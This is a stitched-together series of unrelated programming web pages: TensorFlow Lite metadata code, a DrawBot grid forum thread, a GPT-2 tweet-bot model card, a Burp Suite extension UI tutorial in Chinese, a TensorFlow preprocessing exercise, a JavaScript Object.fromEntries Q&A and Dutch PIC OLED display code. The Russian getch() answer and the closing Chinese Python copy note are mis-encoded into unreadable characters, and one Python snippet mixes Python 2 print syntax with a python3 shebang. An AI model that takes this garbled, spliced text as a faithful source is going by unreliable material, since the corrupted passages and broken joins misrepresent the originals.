model_meta = _metadata_fb.ModelMetadataT()
model_meta.name = "MobileNetV1 image classifier"
model_meta.description = ("Identify the most prominent object in the "
"image from a set of 1,001 categories such as "
"trees, animals, food, vehicles, person etc.")
model_meta.version = "v1"
model_meta.author = "TensorFlow"
model_meta.license = ("Apache License. Version 2.0 "
"http://www.apache.org/licenses/LICENSE-2.0.")
# Describe input and output tensors
# ...
# Writing the metadata to your model
b = flatbuffers.Builder(0)
b.Finish(
model_meta.Pack(b),
_metadata.MetadataPopulator.METADATA_FILE_IDENTIFIER)
metadata_buf = b.Output()
populator = _metadata.MetadataPopulator.with_model_file(model_file)
populator.load_metadata_buffer(metadata_buf)
populator.load_associated_files(["your_path_to_label_file"])
populator.populate()
For a complete example of how we populate the metadata for MobileNet v1, please refer to this guide.
Pixel 4 - Single Threaded CPU, February 2020
April 14, 2020 — Posted by Khanh LeViet, Developer Advocate
TensorFlow Lite is the official framework to run inference with TensorFlow models on edge devices. TensorFlow Lite is deployed on more than 4 billions edge devices worldwide, supporting Android, iOS, Linux-based IoT devices and microcontrollers.
Since first launch in late 2017, we have been improving TensorFlow Lite to make it robust while keeping it easy…
|
Grid
eduairetlast edited by gferreira
Hi everyone, Iâve been learning to use drawbot; Iâm trying to make a grid, Iâve figured the next code, but I have problems with a guide at the end of the canvas both x and y side. Does anybody know how can I fix it? Thank you very much.
#We're going to create the canvas
def canvas(w, h):
newPage(w, h)
fill(1)
rect(0, 0, w, h)
canvas(1000, 1000)
#Defining the grid
rows = 1
cols = 1
strokeWidth(2)
stroke(0,1,1)
def vGuide (cols, gutter):
for currentCol in range(cols):
pos = width()/(cols)
x = width()/(cols) + currentCol*pos
y = 0
print(pos)
line((x-(gutter/2), y),(x-(gutter/2), height()))
line((x+(gutter/2), y),(x+(gutter/2), height()))
def hGuide (rows, gutter):
for currentRow in range(rows):
pos = width()/(rows)
x = 0
y = width()/(rows) + currentRow*pos
print(pos)
line((x, y-(gutter/2)),(width(), y-(gutter/2)))
line((x, y+(gutter/2)),(width(), y+(gutter/2)))
#Execute
vGuide(4, 12)
hGuide(4, 12)
gferreiralast edited by
hello @eduairet,
the number of
spacesbetween columns is the number of columns + 1. so:
def vGuide(cols, gutter):
for currentCol in range(cols+1):
x = width() / cols * currentCol
# ...
def hGuide(rows, gutter):
for currentRow in range(rows+1):
y = height() / rows * currentRow
# ...
you can also loop over the actual rows and columns to create a grid using rectangles:
size(1000, 700)
cols = 4
rows = 3
gutter = 12
w = (width() - gutter * (cols + 1)) / cols
h = (height() - gutter * (rows + 1)) / rows
fill(None)
strokeWidth(2)
stroke(0, 1, 1)
for col in range(cols):
for row in range(rows):
x = gutter + col * (w + gutter)
y = gutter + row * (h + gutter)
rect(x, y, w, h)
cheers!
eduairetlast edited by eduairet
w = (width() - gutter * (cols + 1)) / cols
h = (height() - gutter * (rows + 1)) / rows
Thank you very much, it worked way much better, I also tried to add a margin feature that worked well so now I can design over the grid
size(1000, 1000)
cols = 3
rows = 3
gutter = 12
#Margin
mTop = 10 - gutter
mBottom = 20 - gutter
mLeft = 10 - gutter
mRight = 10 - gutter
w = (width() - gutter * (cols + 1)) / cols - ((mRight + mLeft) / cols)
h = (height() - gutter * (rows + 1)) / rows - ((mTop + mBottom) / rows)
fill(None)
strokeWidth(1)
stroke(0, 1, 1)
for col in range(cols):
for row in range(rows):
x = gutter + col * (w + gutter)
y = gutter + row * (h + gutter)
rect(x + mLeft, y + mBottom, w, h)
|
I was made with huggingtweets.
Create your own bot based on your favorite user with the demo!
How does it work?
The model uses the following pipeline.
To understand how the model was developed, check the W&B report.
Training data
The model was trained on @matteosalvinimi's tweets.
Data Quantity
Tweets downloaded 3247
Retweets 16
Short tweets 62
Tweets kept 3169
Training procedure
The model is based on a pre-trained GPT-2 which is fine-tuned on @matteosalvinimi's tweets.
Hyperparameters and metrics are recorded in the W&B training run for full transparency and reproducibility.
At the end of training, the final model is logged and versioned.
Intended uses & limitations
How to use
You can use this model directly with a pipeline for text generation:
from transformers import pipeline
generator = pipeline('text-generation',
model='huggingtweets/matteosalvinimi')
generator("My dream is", num_return_sequences=5)
Limitations and bias
The model suffers from the same limitations and bias as GPT-2.
In addition, the data present in the user's tweets further affects the text generated by the model.
About
Built by Boris Dayma
Downloads last month
0
|
Ðак оÑганизоваÑÑ ÑÑнкÑиÑ, подобнÑÑ getch() в С++? Ðли, можеÑ, библиоÑеки какие еÑÑÑ? ÐÑжно, ÑÑÐ¾Ð±Ñ Ð¿ÑогÑамма ожидала ввода одного лÑбого Ñимвола.
Ðак оÑганизоваÑÑ ÑÑнкÑиÑ, подобнÑÑ
ÐÑганизоваÑÑ Ð¼Ð¾Ð¶Ð½Ð¾ пÑимеÑно Ñак:
#!/usr/bin/env python3
# CursesExample1
#-------------------------------
# Curses Programming Sample 1
#-------------------------------
import curses
myscreen = curses.initscr()
myscreen.border(0)
myscreen.addstr(12, 25, "See Curses, See Curses Run!")
myscreen.refresh()
myscreen.getch()
curses.endwin()
ÐодÑобнее можно поÑмоÑÑеÑÑ Ð·Ð´ÐµÑÑ.
Ðбновление:
РеÑли Ñ ÐÐ°Ñ Windows, Ñо вÑе пÑоÑе:
import msvcrt
while True:
pressedKey = msvcrt.getch()
if pressedKey == 'q':
print "Q was pressed"
elif pressedKey == 'x':
sys.exit()
else:
print "Key Pressed:" + str(pressedKey)
|
添加自定义的tab需要调用的接口是ITab,需要调用addSuiteTab注册tab
This interface is used to provide Burp with details of a custom tab that will be added to Burp’s UI, using a method such as IBurpExtenderCallbacks.addSuiteTab().
必须实现下面两个方法用于 BURP 显示 Tab 的内容
Modifier and Type Method and Description
java.lang.String getTabCaption()
Burp uses this method to obtain the caption that should appear on the custom tab when it is displayed.
java.awt.Component getUiComponent()
Burp uses this method to obtain the component that should be used as the contents of the custom tab when it is displayed.
大致用法如下
# 用于设置 Tab 显示名
def getTabCaption(self):
return "RSA Plugin"
# 用于点击 Tab 时显示 UI 界面,self.tab是自定义的 UI 结构
def getUiComponent(self):
return self.tab
另外在getUiComponent方法可以用IBurpExtenderCallbacks.customizeUiComponent方法代替
右键菜单需要调用的是IContextMenuFactory,根据说明,需在通过registerContextMenuFactory注册自定义菜单
Extensions can implement this interface and then call IBurpExtenderCallbacks.registerContextMenuFactory() to register a factory for custom context menu items.
构建自定义菜单需要重写的方法是,可以通过invocation来判断触发的界面,可以动态构建菜单
Modifier and Type Method and Description
java.util.List<javax.swing.JMenuItem> createMenuItems(IContextMenuInvocation invocation)
This method will be called by Burp when the user invokes a context menu anywhere within Burp.
这里给加密解密都添加了额外的request/response,让用户来选择请求来源
更新:可以调用getToolFlag获取点击的菜单,getInvocationContext获取调用的上下文本环境
def createMenuItems(self, invocation):
self._invocation = invocation
self._messages_index = self._invocation.getSelectionBounds()
self._messages = self._invocation.getSelectedMessages()
self._servicetype = self._invocation.getInvocationContext() % 2
top_menu = swing.JMenu(self._title)
for _item in self.typeString:
top_menu.add(swing.JMenuItem(_item, actionPerformed=lambda x: self.evenHandler(x)))
return [top_menu]
InvacationContext取值主要为加粗标记的,可以通过简单余2来判断被选择文本来自request还是response
Constant Field Value
CONTEXT_INTRUDER_ATTACK_RESULTS 9
CONTEXT_INTRUDER_PAYLOAD_POSITIONS 8
CONTEXT_MESSAGE_EDITOR_REQUEST 0
CONTEXT_MESSAGE_EDITOR_RESPONSE 1
CONTEXT_MESSAGE_VIEWER_REQUEST 2
CONTEXT_MESSAGE_VIEWER_RESPONSE 3
CONTEXT_PROXY_HISTORY 6
这个需求需要看在什么地方使用,这里是想实现类似Decoder右键快速替换的功能,调用的接口为IContextMenuInvocation,主要的方法是以下两个
Modifier and Type Method and Description
IHttpRequestResponse[] getSelectedMessages() This method can be used to retrieve details of the HTTP requests / responses that were shown or selected by the user when the context menu was invoked.
int[] getSelectionBounds() This method can be used to retrieve the bounds of the user’s selection into the current message, if applicable.
这里要注意,getSelectedMessages返回的类型是IHttpRequestResponse,所以需要自行判断选择的文本来自request还是response,否则结合getSelectionBounds给出的选定界限导出来的被选择文本可能是错误的,当然大多都来自前者,最后返回string是为了方便在中间输出日志信息
"""
@param sourcetype: 0 - Request
1 - Response
@return: String
"""
def getSelectedMessagesString(self):
if self._servicetype == 0:
self._tmpService = self._messages[0].getRequest()
elif self._servicetype == 1:
self._tmpService = self._messages[0].getResponse()
self._tmpText = self._tmpService[self._messages_index[0]:self._messages_index[1]].tostring()
return self._tmpText
执行替换时,直接替换所有的文本
def replaceText(self, data, rsastatus):
if self.autoReplaceStuts is True and rsastatus is True:
new_text = self._tmpService[:self._messages_index[0]] + self._helpers.stringToBytes(data) + self._tmpService[self._messages_index[1]:]
if self._servicetype == 0:
self._messages[0].setRequest(new_text)
elif self._servicetype == 1:
self._messages[0].setResponse(new_text)
1. 插件入口和帮助接口类:IBurpExtender、IBurpExtenderCallbacks、IExtensionHelpers、IExtensionStateListenerIBurpExtender接口类是Burp插件的入口,所有Burp的插件均需要实现此接口,并且类命名为BurpExtender。 IBurpExtenderCallbacks接口类是IBurpExtender接口的实现类与Burp其他各个组件(Scanner、Intruder、Spider......)、各个通信对象(HttpRequestResponse、HttpService、SessionHandlingAction)之间的纽带。 IExtensionHelpers、IExtensionStateListener这两个接口类是插件的帮助和管理操作的接口定义。2. UI相关接口类:IContextMenuFactory、IContextMenuInvocation、ITab、ITextEditor、IMessageEditor、IMenuItemHandler这类接口类主要是定义Burp插件的UI显示和动作的处理事件,主要是软件交互中使用。3. Burp工具组件接口类:IInterceptedProxyMessage、IIntruderAttack、IIntruderPayloadGenerator、IIntruderPayloadGeneratorFactory、IIntruderPayloadProcessor、IProxyListener、IScanIssue、IScannerCheck、IScannerInsertionPoint、IScannerInsertionPointProvider、IScannerListener、IScanQueueItem、IScopeChangeListener这些接口类的功能非常好理解,Burp在接口定义的命名中使用了的见名知意的规范,看到接口类的名称,基本就能猜测出来这个接口是适用于哪个工具组件。4. HTTP消息处理接口类:ICookie、IHttpListener、IHttpRequestResponse、IHttpRequestResponsePersisted、IHttpRequestResponseWithMarkers、IHttpService、IRequestInfo、IParameter、IResponseInfo这些接口的定义主要是围绕HTTP消息通信过程中涉及的Cookie、Request、Response、Parameter几大消息对象,通过对通信消息头、消息体的数据处理,来达到控制HTTP消息传递的目的。
老版本通过用户选择本文来源,后面更新后懒得重新截取动图了:3
|
#NoPayJan Offer - Access all CloudxLab Courses for free between 1st to 31st Jan
Now we will create this preprocessing function where we will:
Truncate the reviews, keeping only the first 300 characters of each since you can generally tell whether a review is positive or not in the first sentence or two.
Then we use regular expressions to replace <br/> tags with spaces and to replace any characters other than letters and quotes with spaces.
Finally, the preprocess() function splits the reviews by the spaces, which returns a ragged tensor, and it converts this ragged tensor to a dense tensor, padding all reviews with the padding token <pad> so that they all have the same length.
Note:
tf.strings - Operations for working with string Tensors.
tf.strings.substr(X_batch, 0, 300) - For each string in the input Tensor X_batch, it creates a substring starting at index pos(here 0) with a total length of len(here 300). So basically, it returns substrings from Tensor of strings.
tf.strings.regex_replace(X_batch, rb"<br\s*/?>", b" ") - Replaces elements of X_batch matching regex pattern <br\s*/?> with rewrite .
tf.strings.split(X_batch) - Split elements of input X_batch into a RaggedTensor.
X_batch.to_tensor(default_value=b"<pad>") - Converts the RaggedTensor into a tf.Tensor. default_value is the value to set for indices not specified in X_batch. Empty values are assigned default_value(here <pad>).
Use the following code to preprocess the data as described above:
def preprocess(X_batch, y_batch):
X_batch = tf.strings.substr(X_batch, 0, 300)
X_batch = tf.strings.regex_replace(X_batch, rb"<br\s*/?>", b" ")
X_batch = tf.strings.regex_replace(X_batch, b"[^a-zA-Z']", b" ")
X_batch = tf.strings.split(X_batch)
return X_batch.to_tensor(default_value=b"<pad>"), y_batch
Let us now call the preprocess() function on X_batch, y_batch to see how the data after preprocessing looks like:
<< your code comes here >>(X_batch, y_batch)
No hints are availble for this assesment
Answer is not availble for this assesment
Note - Having trouble with the assessment engine? Follow the steps listed here
|
In Python one can pass the dict1 constructor a sequence of key-value pairs:
>>> dict([['name', 'Bob'], ['age', 42], ['breakfast', 'eggs']])
{'age': 42, 'name': 'Bob', 'breakfast': 'eggs'}
I can't think of any way to do this sort of thing in JavaScript other than defining my own function for the purpose:
function pairs_to_object(pairs) {
var ret = {};
pairs.forEach(function (p) { ret[p[0]] = p[1]; });
return ret;
}
But I'm a JS noob... Is there anything built-in for this sort pairs-to-object conversion?
1 For the purposes of this question, I'm treating Python dicts as Python's counterpart of JS objects, although, of course the similarity is limited only to the fact that they are both key-value collections.
At the time of writing (2013) JavaScript objects / dictionaries / associative arrays don't have such a constructor natively.
As you said yourself, you can of course build your own function using for instance a functional approach using the reduce function as explained in one of the other answers. A classic for or newer forEach loop would also work, of course. But there isn't anything built-in.
Edit: It's 2019 and now we have Object.fromEntries, which will give you what you need.
You can use the reduce function
x = [[1,2],[3,4],[5,6]];
o = x.reduce(function(prev,curr){prev[curr[0]]=curr[1];return prev;},{})
o is now the equivalent of {1:2, 3:4, 5:6}
If your input array is sparse, you'll want to add a if(curr!=undefined) test on the assignment, but make sure you still return "prev".
If your tuples are something more complex than simple [key,value], you can simply change the way "prev" is assigned to. Eg: prev["key-"+curr[0].toString()]=curr[1]*2;
Lodash's fromPairs function will do this:
const _ = require('lodash')
const kvPairs = [['a', 1], ['b', 2]]
_.fromPairs(kvPairs)
// => { a: 1, b: 2 }
Javascript does not have a native function for converting an array into an object in the way you have described. But, this is because there is no need for it. You have already included in the question an example solution, where you define the function yourself, but that really isn't necessary. As long as you can be sure that the input array is correct, you could even do the conversion with a simple for loop, like so:
var input = [['name', 'Bob'], ['age', 42], ['breakfast', 'eggs']];
var output = {};
for(i in input) output[input[i][0]] = input[i][1];
Which is just about the most basic code imaginable.
Of course, (as mamapitufo points out) it is generally a bad idea to actually use for..in to iterate over an array, because that will also return non-indexes as values of i. Still, the point is that this kind of operation is too simple, and too rarely needed, to justify having a native function.
The python dict is a structure which is not needed in javascript, because the two languages have different approaches to typing, and to design in general, and so what is useful to one is not useful to another. While you could work on using the same methods and structures that you used in python, it might be a better idea to think about how to take advantage of javascript's different way of doing things - maybe you will find that you don't need a dict after all.
Object.fromEntries()
There is a method on the Object object called Object.fromEntries(iterable). The iterator object from the iterable object has to produce an array with 2 elements. The first (index 0) array element will be the object key and the second the value.
MDN describes this very accurately:
The
Object.fromEntries()method takes a list of key-value pairs and returns a new object whose properties are given by those entries. The iterable argument is expected to be an object that implements an@@iteratormethod, that returns an iterator object, that produces a two element array-like object, whose first element is a value that will be used as a property key, and whose second element is the value to associate with that property key.
You don't even need to know the specifics of an iterable object in order to use the Object.fromEntries() method. You can always use the method on the following objects:
Here is an example:
// map example:
const map = new Map([ ['hi', 'there'], ['foo', 2] ]);
const objFromMap = Object.fromEntries(map);
console.log(objFromMap); // { hi: "there", foo: 2 }
// array example:
const array = [ ['0', '00'], ['1', '11'], ['2', '22'] ];
const objFromArray = Object.fromEntries(array);
console.log(objFromArray); // { 0: "00", 1: "11", 2: "22" }
At the time of this writing (december 2019) this method is relatively new and not implemented by all browsers. In order to use this method and to ensure that you JS code will run in all browsers you might have to transpile your code to a earlier version of JS.
Object.fromEntries does the job. It was added to the language with EcmaScript2019.
If you don't have support for that function, you could define it yourself with the following ES2015 code:
Object.fromEntries = arr => Object.assign({}, ...Array.from(arr, ([k, v]) => ({[k]: v}) ));
A nice thing is that this method does the opposite of Object.entries (ES2017), so now you can go back and forth between the object and array representation:
const arr = [['name', 'Bob'], ['age', 42], ['breakfast', 'eggs']];
const obj = Object.fromEntries(arr);
console.log(obj);
// ... and back:
const arr2 = Object.entries(obj);
console.log(arr2); // copy of the original array (omitting duplicate keys)
.as-console-wrapper { max-height: 100% !important; top: 0; }
There is an alternative to plain objects for key/value pairs: Map.
Its constructor accepts the array-of-pairs format:
// Demo:
const arr = [['name', 'Bob'], ['age', 42], ['breakfast', 'eggs']];
const mp = new Map(arr);
// Get one particular value:
console.log(mp.get('age'));
// Get all the keys:
console.log(...mp.keys());
// Get all the values:
console.log(...mp.values());
// Get all the key/value pairs:
console.log(...mp.entries());
If you really need a plain object, then this is not useful, but a Map might present a viable alternative.
©2020 All rights reserved.
|
Ik ben nu aan het testen met een 1,3"Oled display, 240 * 240 met SPI interface (IC: ST7789).
Ik heb geprobeerd om het programma van Arco om te te zetten naar een PIC16F887, maar lukt niet echt:
pic basic code:
e MikroBasic code om te testen (past nog in de demo versie van de dsPic compiler):
pic basic code:
'==================================================================================================
' Project name: Test_Oled - CONFIG1 : 0x3F7F
' MCU: PIC24FJ256GA106 - CONFIG2 : 0x92BE
' Oscillator: HS, 8.0000 MHz - CONFIG3 : 0xFFFF
'==================================================================================================
program Test_Oled
Dim SSel As sBit At LATD.9 'Display select
D_C As sBit At LATF.5 'Data/Command
const Char6x8 As Byte[570] = ( 'Character table
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ' sp
0x00, 0x00, 0x00, 0x2f, 0x00, 0x00, ' !
0x00, 0x00, 0x07, 0x00, 0x07, 0x00, ' "
0x00, 0x14, 0x7f, 0x14, 0x7f, 0x14, ' #
0x00, 0x24, 0x2a, 0x7f, 0x2a, 0x12, ' $
0x00, 0x62, 0x64, 0x08, 0x13, 0x23, ' %
0x00, 0x36, 0x49, 0x55, 0x22, 0x50, ' &
0x00, 0x00, 0x05, 0x03, 0x00, 0x00, ' '
0x00, 0x00, 0x1c, 0x22, 0x41, 0x00, ' (
0x00, 0x00, 0x41, 0x22, 0x1c, 0x00, ' )
0x00, 0x14, 0x08, 0x3E, 0x08, 0x14, ' *
0x00, 0x08, 0x08, 0x3E, 0x08, 0x08, ' +
0x00, 0x00, 0x00, 0xA0, 0x60, 0x00, ' ,
0x00, 0x08, 0x08, 0x08, 0x08, 0x08, ' -
0x00, 0x00, 0x60, 0x60, 0x00, 0x00, ' .
0x00, 0x20, 0x10, 0x08, 0x04, 0x02, ' /
0x00, 0x3E, 0x51, 0x49, 0x45, 0x3E, ' 0
0x00, 0x00, 0x42, 0x7F, 0x40, 0x00, ' 1
0x00, 0x42, 0x61, 0x51, 0x49, 0x46, ' 2
0x00, 0x21, 0x41, 0x45, 0x4B, 0x31, ' 3
0x00, 0x18, 0x14, 0x12, 0x7F, 0x10, ' 4
0x00, 0x27, 0x45, 0x45, 0x45, 0x39, ' 5
0x00, 0x3C, 0x4A, 0x49, 0x49, 0x30, ' 6
0x00, 0x01, 0x71, 0x09, 0x05, 0x03, ' 7
0x00, 0x36, 0x49, 0x49, 0x49, 0x36, ' 8
0x00, 0x06, 0x49, 0x49, 0x29, 0x1E, ' 9
0x00, 0x00, 0x36, 0x36, 0x00, 0x00, ' :
0x00, 0x00, 0x56, 0x36, 0x00, 0x00, ' ;
0x00, 0x08, 0x14, 0x22, 0x41, 0x00, ' <
0x00, 0x14, 0x14, 0x14, 0x14, 0x14, ' =
0x00, 0x00, 0x41, 0x22, 0x14, 0x08, ' >
0x00, 0x02, 0x01, 0x51, 0x09, 0x06, ' ?
0x00, 0x32, 0x49, 0x59, 0x51, 0x3E, ' @
0x00, 0x7C, 0x12, 0x11, 0x12, 0x7C, ' A
0x00, 0x7F, 0x49, 0x49, 0x49, 0x36, ' B
0x00, 0x3E, 0x41, 0x41, 0x41, 0x22, ' C
0x00, 0x7F, 0x41, 0x41, 0x22, 0x1C, ' D
0x00, 0x7F, 0x49, 0x49, 0x49, 0x41, ' E
0x00, 0x7F, 0x09, 0x09, 0x09, 0x01, ' F
0x00, 0x3E, 0x41, 0x49, 0x49, 0x7A, ' G
0x00, 0x7F, 0x08, 0x08, 0x08, 0x7F, ' H
0x00, 0x00, 0x41, 0x7F, 0x41, 0x00, ' I
0x00, 0x20, 0x40, 0x41, 0x3F, 0x01, ' J
0x00, 0x7F, 0x08, 0x14, 0x22, 0x41, ' K
0x00, 0x7F, 0x40, 0x40, 0x40, 0x40, ' L
0x00, 0x7F, 0x02, 0x0C, 0x02, 0x7F, ' M
0x00, 0x7F, 0x04, 0x08, 0x10, 0x7F, ' N
0x00, 0x3E, 0x41, 0x41, 0x41, 0x3E, ' O
0x00, 0x7F, 0x09, 0x09, 0x09, 0x06, ' P
0x00, 0x3E, 0x41, 0x51, 0x21, 0x5E, ' Q
0x00, 0x7F, 0x09, 0x19, 0x29, 0x46, ' R
0x00, 0x46, 0x49, 0x49, 0x49, 0x31, ' S
0x00, 0x01, 0x01, 0x7F, 0x01, 0x01, ' T
0x00, 0x3F, 0x40, 0x40, 0x40, 0x3F, ' U
0x00, 0x1F, 0x20, 0x40, 0x20, 0x1F, ' V
0x00, 0x3F, 0x40, 0x38, 0x40, 0x3F, ' W
0x00, 0x63, 0x14, 0x08, 0x14, 0x63, ' X
0x00, 0x07, 0x08, 0x70, 0x08, 0x07, ' Y
0x00, 0x61, 0x51, 0x49, 0x45, 0x43, ' Z
0x00, 0x00, 0x7F, 0x41, 0x41, 0x00, ' [
0x00, 0x55, 0x2A, 0x55, 0x2A, 0x55, ' \
0x00, 0x00, 0x41, 0x41, 0x7F, 0x00, ' ]
0x00, 0x04, 0x02, 0x01, 0x02, 0x04, ' ^
0x00, 0x40, 0x40, 0x40, 0x40, 0x40, ' _
0x00, 0x00, 0x01, 0x02, 0x04, 0x00, ' '
0x00, 0x20, 0x54, 0x54, 0x54, 0x78, ' a
0x00, 0x7F, 0x48, 0x44, 0x44, 0x38, ' b
0x00, 0x38, 0x44, 0x44, 0x44, 0x20, ' c
0x00, 0x38, 0x44, 0x44, 0x48, 0x7F, ' d
0x00, 0x38, 0x54, 0x54, 0x54, 0x18, ' e
0x00, 0x08, 0x7E, 0x09, 0x01, 0x02, ' f
0x00, 0x18, 0xA4, 0xA4, 0xA4, 0x7C, ' g
0x00, 0x7F, 0x08, 0x04, 0x04, 0x78, ' h
0x00, 0x00, 0x44, 0x7D, 0x40, 0x00, ' i
0x00, 0x40, 0x80, 0x84, 0x7D, 0x00, ' j
0x00, 0x7F, 0x10, 0x28, 0x44, 0x00, ' k
0x00, 0x00, 0x41, 0x7F, 0x40, 0x00, ' l
0x00, 0x7C, 0x04, 0x18, 0x04, 0x78, ' m
0x00, 0x7C, 0x08, 0x04, 0x04, 0x78, ' n
0x00, 0x38, 0x44, 0x44, 0x44, 0x38, ' o
0x00, 0xFC, 0x24, 0x24, 0x24, 0x18, ' p
0x00, 0x18, 0x24, 0x24, 0x18, 0xFC, ' q
0x00, 0x7C, 0x08, 0x04, 0x04, 0x08, ' r
0x00, 0x48, 0x54, 0x54, 0x54, 0x20, ' s
0x00, 0x04, 0x3F, 0x44, 0x40, 0x20, ' t
0x00, 0x3C, 0x40, 0x40, 0x20, 0x7C, ' u
0x00, 0x1C, 0x20, 0x40, 0x20, 0x1C, ' v
0x00, 0x3C, 0x40, 0x30, 0x40, 0x3C, ' w
0x00, 0x44, 0x28, 0x10, 0x28, 0x44, ' x
0x00, 0x1C, 0xA0, 0xA0, 0xA0, 0x7C, ' y
0x00, 0x44, 0x64, 0x54, 0x4C, 0x44, ' z
0x00, 0x10, 0x6C, 0x82, 0x00, 0x00, ' {
0x00, 0x00, 0x00, 0xFE, 0x00, 0x00, ' |
0x00, 0x00, 0x00, 0x82, 0x6C, 0x10, ' }
0x14, 0x14, 0x14, 0x14, 0x14, 0x14) ' horiz lines
'==================================================================================================
Sub Procedure Init_App() 'Initialize pillbox
'==================================================================================================
Dim lRet As Byte
delay_ms(100)
TRISD = %0000000000001011 '
TRISF = %0000000000000000 '
LATD = %0000001000000010 '
LATF = %0000000000000000 '
Unlock_IOLock()
PPS_Mapping_NoLock( 3,_OUTPUT,_SDO1) 'RP3 (= LATD.10 pin)
PPS_Mapping_NoLock(12,_OUTPUT,_SCK1OUT) 'RP12 (= LATD.11 pin)
Lock_IOLock()
Spi1_Init_Advanced(_SPI_MASTER,
_SPI_8_BIT,
_SPI_PRESCALE_SEC_1,
_SPI_PRESCALE_PRI_16,
_SPI_SS_DISABLE,
_SPI_DATA_SAMPLE_MIDDLE,
_SPI_CLK_IDLE_HIGH,
_SPI_IDLE_2_ACTIVE)
Delay_ms(100)
End Sub
'==================================================================================================
Sub Procedure Lcd_WrCmd(Dim pCmd As Byte) 'Write command to display
'==================================================================================================
D_C = 0
Spi1_Write(pCmd)
End Sub
'==================================================================================================
Sub Procedure Lcd_WrDat(Dim pDat As Byte) 'Write data to display
'==================================================================================================
Dim lCnt As Byte
D_C = 1
Spi1_Write(pDat)
End Sub
'==================================================================================================
Sub Procedure Lcd_SetPos(Dim px, py as Byte) 'Set write position on display
'==================================================================================================
delay_us(1)
Lcd_WrCmd(0xB0 + py)
Lcd_WrCmd((px >> 4) Or 0x10)
Lcd_WrCmd((px And 0x0F))
delay_us(1)
End Sub
'==================================================================================================
Sub Procedure LCD_Fill(Dim pFill As Byte) 'Fill display with character pFill
'==================================================================================================
Dim lx, ly As Byte
For ly = 0 To 8
Lcd_WrCmd(0xB0+ly)
Lcd_WrCmd(0x01)
Lcd_WrCmd(0x10)
For lx = 0 to 131
Lcd_WrDat(pFill)
Next lx
Next ly
End Sub
'==================================================================================================
Sub Procedure Lcd_Char_6x8(Dim px, py, pchar As Byte) 'Write one character
'==================================================================================================
Dim lIndex As Word
Lcd_SetPos(px, py)
lIndex = pChar - 0x20
lIndex = (lIndex << 2) + (lIndex << 1)
Lcd_WrDat(Char6x8[lIndex+0])
Lcd_WrDat(Char6x8[lIndex+1])
Lcd_WrDat(Char6x8[lIndex+2])
Lcd_WrDat(Char6x8[lIndex+3])
Lcd_WrDat(Char6x8[lIndex+4])
Lcd_WrDat(Char6x8[lIndex+5])
End Sub
'==================================================================================================
Sub Procedure Lcd_String_6x8(Dim px, py As Byte, Dim ByRef pDisp As String) ' Write string
'==================================================================================================
Dim lLen, lCnt As Byte
lLen = Length(pDisp)
For lCnt = 0 To (lLen-1)
If px >= 124 Then px = 0 py = py+1 End If
Lcd_Char_6x8(px, py, pDisp[lCnt])
px = px + 6
Next lCnt
End Sub
'==================================================================================================
Main: 'Main program
'==================================================================================================
Init_App() 'Initialize
SSel = 0
delay_ms(500)
SSEL = 1 'Only for 0.96", for 1.3" remove it
delay_ms(500)
Lcd_WrCmd(0xAE) 'Turn OLED panel off
'--------------------------------------------------------------------------
Lcd_WrCmd(0xA8) 'Multiplex ratio set to
Lcd_WrCmd(0x3F) '63
'--------------------------------------------------------------------------
Lcd_WrCmd(0xD3) 'Display offset RAM counter
Lcd_WrCmd(0x00) 'none
'--------------------------------------------------------------------------
Lcd_WrCmd(0x40) 'Start line address
'--------------------------------------------------------------------------
Lcd_WrCmd(0xA1) 'Set segment remap rotation to left
'--------------------------------------------------------------------------
Lcd_WrCmd(0xC8) 'Common output scan direction
'--------------------------------------------------------------------------
Lcd_WrCmd(0xDA) 'Common signals pad
Lcd_WrCmd(0x12) 'value
'--------------------------------------------------------------------------
Lcd_WrCmd(0x81) 'Contrast control
Lcd_WrCmd(0xFF) 'value
'--------------------------------------------------------------------------
Lcd_WrCmd(0xA4)
'--------------------------------------------------------------------------
Lcd_WrCmd(0xA6) 'Normal display
'--------------------------------------------------------------------------
Lcd_WrCmd(0xD5) 'Clock ratio:oscillator frequency
Lcd_WrCmd(0x80) 'oooo:rrrr
'--------------------------------------------------------------------------
Lcd_WrCmd(0x8D)
Lcd_WrCmd(0x14)
'--------------------------------------------------------------------------
Lcd_WrCmd(0x00) 'Set lower column address
Lcd_WrCmd(0x10) 'Set higher column address
'--------------------------------------------------------------------------
Lcd_WrCmd(0xD9) '15 clocks, discharge 1 clock
Lcd_WrCmd(0xF1) 'dddd:pppp
'--------------------------------------------------------------------------
Lcd_WrCmd(0xDB) 'Common output voltage
Lcd_WrCmd(0x40) 'level
'--------------------------------------------------------------------------
Lcd_WrCmd(0x20) 'Addressing mode
Lcd_WrCmd(0x02) 'value
'--------------------------------------------------------------------------
' Lcd_WrCmd(0xA7)
Lcd_Fill(0x00)
Lcd_SetPos(0,0)
'--------------------------------------------------------------------------
Lcd_String_6x8(0,0,"Dit is een test van")
Lcd_String_6x8(0,1,"een 128x64 pixel gra-")
Lcd_String_6x8(0,2,"fisch OLED display.")
Lcd_String_6x8(0,3,"Met 't 6x8 pixel font")
Lcd_String_6x8(0,4,"gaat er heel wat in-")
Lcd_String_6x8(0,5,"formatie op zo'n mini")
Lcd_String_6x8(0,6,"scherm van 1.1x2.2cm")
Lcd_String_6x8(0,7,"(en toch nog scherp!)")
Lcd_WrCmd(0xAF) 'Turn OLED panel on
delay_ms(500)
SSel = 1
While True
Wend
End.
Deze routines
pic basic code:
Unlock_IOLock()
PPS_Mapping_NoLock( 3,_OUTPUT,_SDO1) 'RP3 (= LATD.10 pin)
PPS_Mapping_NoLock(12,_OUTPUT,_SCK1OUT) 'RP12 (= LATD.11 pin)
Lock_IOLock()
Spi1_Init_Advanced(_SPI_MASTER,
_SPI_8_BIT,
_SPI_PRESCALE_SEC_1,
_SPI_PRESCALE_PRI_16,
_SPI_SS_DISABLE,
_SPI_DATA_SAMPLE_MIDDLE,
_SPI_CLK_IDLE_HIGH,
_SPI_IDLE_2_ACTIVE)
lopen sowieso al niet (kunnen ws dus niet bij de 887).
Ik heb de poorten aangepast, maar zonder resultaat (display doet niks)
|
pythonåºç¡-æ·±æ·è´ãæµ æ·è´
æ ç¾ï¼ æ·±æ·è´æµ æ·è´
â==âæ¯æ¯è¾ä¸¤ä¸ªå¯¹è±¡æ¯å¦ç¸çï¼èä¸ç®¡æ¯ä¸æ¯æååä¸ä¸ªå°å
is æ¯æä¸ä» 对象ç¸çï¼è䏿åçå åå°åä¹ç¸çããï¼å°æ´æ°å¯¹è±¡æ± é¤å¤ï¼
æµ æ·è´ï¼a = [1, 2, 3] b = a æ·è´åid(a)åid(b)ç¸çã
